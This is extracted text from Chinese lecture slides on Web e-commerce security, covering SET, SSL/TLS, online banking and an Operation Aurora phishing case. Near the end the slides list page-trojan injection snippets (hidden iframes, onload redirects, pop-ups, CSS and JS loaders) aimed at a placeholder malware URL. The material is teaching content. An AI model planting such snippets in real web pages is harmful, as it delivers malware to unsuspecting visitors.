版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
Web電子商務(wù)安全第十二章主講人:任凱聯(lián)系方式:renkai_jlxy@163.com百度云盤:/s/1qWykdjQ1第十二章WEB電子商務(wù)安全12.1電子商務(wù)概述12.2安全電子商務(wù)的體系結(jié)構(gòu)12.3安全電子交易SET12.4安全套接字層SSL12.5數(shù)字現(xiàn)金協(xié)議12.6網(wǎng)上銀行2B2C是從企業(yè)到終端客戶(包括個(gè)人消費(fèi)者和組織消費(fèi)者)的業(yè)務(wù)模式。
B2B是企業(yè)與企業(yè)之間的業(yè)務(wù)模式。電子商務(wù)模式3(1)冒名偷窺。(2)篡改數(shù)據(jù)。(3)信息丟失。(4)信息傳遞過程中的破壞。
12.1.2電子商務(wù)的安全4Internet12.2安全電子商務(wù)的體系結(jié)構(gòu)
網(wǎng)絡(luò)平臺電子商務(wù)基礎(chǔ)平臺電子商務(wù)應(yīng)用系統(tǒng)CA認(rèn)證中心、支付網(wǎng)關(guān)、客戶服務(wù)中心
網(wǎng)上投標(biāo)
網(wǎng)上訂票
網(wǎng)上交費(fèi)
網(wǎng)上銀行
網(wǎng)上超市
遠(yuǎn)程醫(yī)療5背景:VISA與MASTERCARD兩大信用卡國際組織共同發(fā)起制定保障在因特網(wǎng)上進(jìn)行安全電子交易的SET(SecureElectronicTransaction)協(xié)議由眾多信息產(chǎn)業(yè)公司,如Microsoft、Netscape、RSA等共同協(xié)作發(fā)展而成用途:圍繞客戶、商家等交易各方相互之間身份的確認(rèn),采用了電子證書等技術(shù),以保障交易安全12.3安全電子交易SET
612.3.1SET協(xié)議概述SET協(xié)議主要內(nèi)容加密算法(RSA和DES)的應(yīng)用證書消息和對象格式購買消息和對象格式付款消息和對象格式參與者之間的消息協(xié)議712.3.1SET協(xié)議概述SET支付系統(tǒng)中的相關(guān)成員:
81.SET協(xié)議消息傳輸過程SET協(xié)議消息發(fā)送過程:
數(shù)字信封:將對稱密鑰通過非對稱公鑰加密的結(jié)果分發(fā)對稱密鑰的方法12.3.2SET協(xié)議工作原理91.SET協(xié)議消息傳輸過程
SET協(xié)議消息接收過程:12.3.2SET協(xié)議工作原理10(1)消費(fèi)者互聯(lián)網(wǎng)購買的物品并形成訂貨單。訂貨單上需包括在線商店、購買物品名稱及數(shù)量、交貨時(shí)間及地點(diǎn)等相關(guān)信息(2)消費(fèi)者選擇付款方式、確認(rèn)訂單、簽發(fā)付款指令。SET開始介入(3)在SET中,消費(fèi)者必須對訂單和付款指令進(jìn)行數(shù)字簽名,同時(shí)利用雙重簽名技術(shù)保證商家看不到消費(fèi)者的賬號信息(4)在線商店接受訂單后,向消費(fèi)者所在銀行請求支付認(rèn)可。信息通過支付網(wǎng)關(guān)到持卡人的發(fā)卡銀行請求支付認(rèn)可。批準(zhǔn)交易后,返回確認(rèn)信息給電商(5)電商發(fā)送訂單確認(rèn)信息給消費(fèi)者(6)電商發(fā)送貨物或提供服務(wù),支付網(wǎng)關(guān)通知發(fā)卡銀行請求支付(7)消費(fèi)者確認(rèn)收貨后,支付網(wǎng)關(guān)支付給收款銀行2.SET協(xié)議流程
12.3.2SET協(xié)議工作原理113.雙重簽名產(chǎn)生背景:消費(fèi)者不想讓銀行看到訂單細(xì)節(jié),同時(shí)也不想讓商家看到銀行支付信息
例如消息A是訂單信息,消息B是支付信息,或者互換一下12.3.2SET協(xié)議工作原理123.雙重簽名消息的驗(yàn)證例如消息A是訂單信息,消息B是支付信息12.3.1SET協(xié)議工作原理13Netscape公司開發(fā)的一個(gè)網(wǎng)絡(luò)安全協(xié)議已成為事實(shí)上的安全網(wǎng)上交易標(biāo)準(zhǔn)協(xié)議三個(gè)版本:SSL1.0SSL2.0SSL3.0IETF發(fā)布了TLS(TransportLayerSecurity),TLS1.0
通常被稱作SSL3.1TLS1.1TLS1.2SSL與SET最大不同在于SSL是一個(gè)雙方協(xié)議,僅提供通信雙方的安全保證,而SET協(xié)議則提供通信多方的安全保證SSL比SET簡單得多,目前在Web服務(wù)中已廣泛使用
12.4安全套接字層SSL(SecureSocketsLayer,SSL)1412.4.1SSL概述SSL功能:客戶認(rèn)證服務(wù)器身份服務(wù)器認(rèn)證客戶身份客戶與服務(wù)器自動(dòng)協(xié)商生成密鑰加密客戶與服務(wù)器間的數(shù)據(jù),并可抵御重放攻擊檢測客戶與服務(wù)器間數(shù)據(jù)的完整性151.SSL協(xié)議體系結(jié)構(gòu)SSL僅被廣泛用于HTTP連接SSL位于TCP和應(yīng)用層協(xié)議(如HTTP)之間理論上,SSL可以運(yùn)行于任何TCP/IP應(yīng)用程序之上,而不用對其做任何修改12.4.2SSL工作原理16SSL記錄協(xié)議在客戶機(jī)和服務(wù)器之間傳輸應(yīng)用數(shù)據(jù)和SSL控制數(shù)據(jù)2.SSL記錄協(xié)議12.4.2SSL工作原理172.SSL記錄協(xié)議SSL記錄協(xié)議報(bào)文格式:
12.4.2SSL工作原理18NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改變密碼規(guī)范協(xié)議和告警協(xié)議195.SSL握手協(xié)議:該協(xié)議允許客戶和服務(wù)器相互驗(yàn)證、協(xié)商加密和MAC算法以及密鑰,用來保護(hù)SSL記錄發(fā)送的數(shù)據(jù)。12.4.2SSL工作原理20網(wǎng)絡(luò)釣魚流程圖2112.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(SpearPhishing)極光行動(dòng)(Aurora)2009年12月中旬可能源自中國“精心策劃且目標(biāo)明確”的一場網(wǎng)絡(luò)攻擊,其名稱“Aurora”(意為極光、歐若拉)來自攻擊者電腦上惡意文件所在路徑的一部分。遭受攻擊的除了Google外,還有20多家公司:其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、賽門鐵克、諾斯洛普·格魯門和陶氏化工Google表示有部分知識產(chǎn)權(quán)遭到盜竊。它認(rèn)為,黑客的主要興趣在于訪問中國持不同政見者的Gmail帳戶美國國務(wù)卿希拉里·克林頓發(fā)表了一則簡短聲明譴責(zé)此次攻擊事件,并要求中國作出回應(yīng)[12]。中國政府當(dāng)時(shí)并未做出正式回應(yīng)美國國會計(jì)劃對Google的指控進(jìn)行調(diào)查,后者指控中國政府利用計(jì)算機(jī)服務(wù)監(jiān)視人權(quán)活動(dòng)人士2212.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(SpearPhishing)極光行動(dòng)(Aurora)攻擊過程回放:搜集Google員工在Facebook、Twitter等社交網(wǎng)站上發(fā)布的信息;利用動(dòng)態(tài)DNS供應(yīng)商建立托管偽造照片網(wǎng)站的Web服務(wù)器,Google員工收到來自信任的人發(fā)來的網(wǎng)絡(luò)鏈接并且點(diǎn)擊,含有shellcode的JavaScript造成IE瀏覽器溢出,遠(yuǎn)程下載并運(yùn)行程序;通過SSL安全隧道與受害人機(jī)器建立連接,持續(xù)監(jiān)聽并最終獲得該雇員訪問Google服務(wù)器的帳號密碼等信息;使用該雇員的憑證成功滲透進(jìn)入Google郵件服務(wù)器,進(jìn)而不斷獲取特定Gmail賬戶的郵件內(nèi)容信息2312.6網(wǎng)上銀行網(wǎng)絡(luò)釣魚(SpearPhishing)極光行動(dòng)(Aurora)從用戶單擊釣魚郵件那一刻開始講起1.三次握手建立連接2.攻擊者的機(jī)器收到一個(gè)GET請求3.數(shù)據(jù)包6返回了一個(gè)302碼(重定向頁面)4.從Details面板中可以看到一個(gè)Location域,它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右擊“FollowTCPStream”2412.6網(wǎng)上銀行病毒2512.6網(wǎng)上銀行2612.6網(wǎng)上銀行根據(jù)顯示的內(nèi)容找到25包2712.6網(wǎng)上銀行已經(jīng)獲得了無限制的管理權(quán)限2812.6網(wǎng)上銀行一些常用的掛馬方式框架掛馬<iframesrc="網(wǎng)馬地址"width=0height=0></iframe>body掛馬<bodyonload="window.location='網(wǎng)馬地址';"></body>java掛馬<scriptlanguage=javascript>window.open("網(wǎng)馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>js文件掛馬將代碼“document.write("<iframewidth=0height=0src='網(wǎng)馬地址'></iframe>");”保存為muma.js文件,則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”2912.6網(wǎng)上銀行一些常用的掛馬方式:css中掛馬body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}高級欺騙<ahref=(迷惑連接地址)onMouseOver="muma();r
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 養(yǎng)老院老人健康監(jiān)測人員職業(yè)發(fā)展規(guī)劃制度
- 世界讀書日主題班會課件
- 2024年特色調(diào)味品全國總經(jīng)銷采購協(xié)議3篇
- 新疆兵團(tuán)連隊(duì)房屋買賣合同(2篇)
- 東南大學(xué)建筑結(jié)構(gòu)設(shè)計(jì)課件-單層排 架建筑
- 2024年版房屋建筑施工承包協(xié)議版
- 2025年陜西從業(yè)資格證貨運(yùn)考試答案
- 《生產(chǎn)損失分析》課件
- 2025年哈爾濱貨運(yùn)從業(yè)資格考試模擬考試題庫答案解析
- 2024年委托反擔(dān)保合同模板-項(xiàng)目投資風(fēng)險(xiǎn)控制協(xié)議3篇
- 文書模板-《公司與村集體合作種植協(xié)議書》
- 碼頭安全生產(chǎn)知識培訓(xùn)
- 《死亡詩社》電影賞析
- JJF(京) 105-2023 網(wǎng)絡(luò)時(shí)間同步服務(wù)器校準(zhǔn)規(guī)范
- 老年科護(hù)理查房護(hù)理病歷臨床病案
- Python語言基礎(chǔ)與應(yīng)用學(xué)習(xí)通超星期末考試答案章節(jié)答案2024年
- 工程系列自然資源行業(yè)級評審專家?guī)斐蓡T表
- 2024秋期國家開放大學(xué)專科《建筑材料A》一平臺在線形考(形考任務(wù)一至四)試題及答案
- 消除“艾梅乙”醫(yī)療歧視-從我做起
- 啤酒釀造與文化學(xué)習(xí)通超星期末考試答案章節(jié)答案2024年
- 2024-2025學(xué)年小學(xué)信息技術(shù)(信息科技)六年級上冊西師大版教學(xué)設(shè)計(jì)合集
評論
0/150
提交評論